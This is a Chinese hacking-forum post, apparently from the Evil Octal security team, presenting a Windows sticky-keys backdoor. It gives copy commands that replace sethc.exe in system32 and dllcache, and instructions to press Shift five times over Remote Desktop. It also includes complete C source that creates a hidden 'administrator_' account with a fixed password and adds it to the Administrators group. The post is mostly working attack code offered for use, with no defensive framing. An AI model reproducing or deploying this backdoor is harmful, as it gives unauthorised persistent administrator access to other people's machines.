软件作者:pt007[at]vip.sina.com
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com)
注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者
copy sethc.exe c:\windows\system32\dllcache\sethc.exe
copy sethc.exe c:\windows\system32\sethc.exe
然后连上3389,按5下shift加入administrator_用户,密码Test!@#123
复制内容到剪贴板
代码:
#include <stdio.h>
#include <windows.h>
#include <lm.h>
#pragma comment(lib,"netapi32")
int wmain()
{
USER_INFO_1 ui;
DWORD dwError = 0;
ui.usri1_name = L"administrator_";
ui.usri1_password = L"Test!@#123";
ui.usri1_priv = USER_PRIV_USER;
ui.usri1_home_dir = NULL;
ui.usri1_comment = NULL;
ui.usri1_flags = UF_SCRIPT;
ui.usri1_script_path = NULL;
//添加名为administrator_的用户,密码为Test!@#123:
if(NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError) == NERR_Success)
{
//添加成功
//fwprintf(stderr, L"User [administrator_] has been successfully added,password is [Test!@#123]\n");
}
else
{
//添加失败
//fwprintf(stderr, L"Add user administrator_ Error!\n");
return 1;
}
wchar_t szAccountName[100]={0}; //字符数组清0
wcscpy(szAccountName,L"administrator_"); //szAccountName=administrator_
LOCALGROUP_MEMBERS_INFO_3 account;
account.lgrmi3_domainandname=szAccountName;
//把administrator_添加到Administrators组
if( NetLocalGroupAddMembers(NULL,L"Administrators",3,(LPBYTE)&account,1) == NERR_Success )
{
//添加成功
//printf("Add to Administrators success.\n");
return 0;
}
else
{
//添加失败
//printf("Add to Administrators Fail!\n");
return 1;
}
}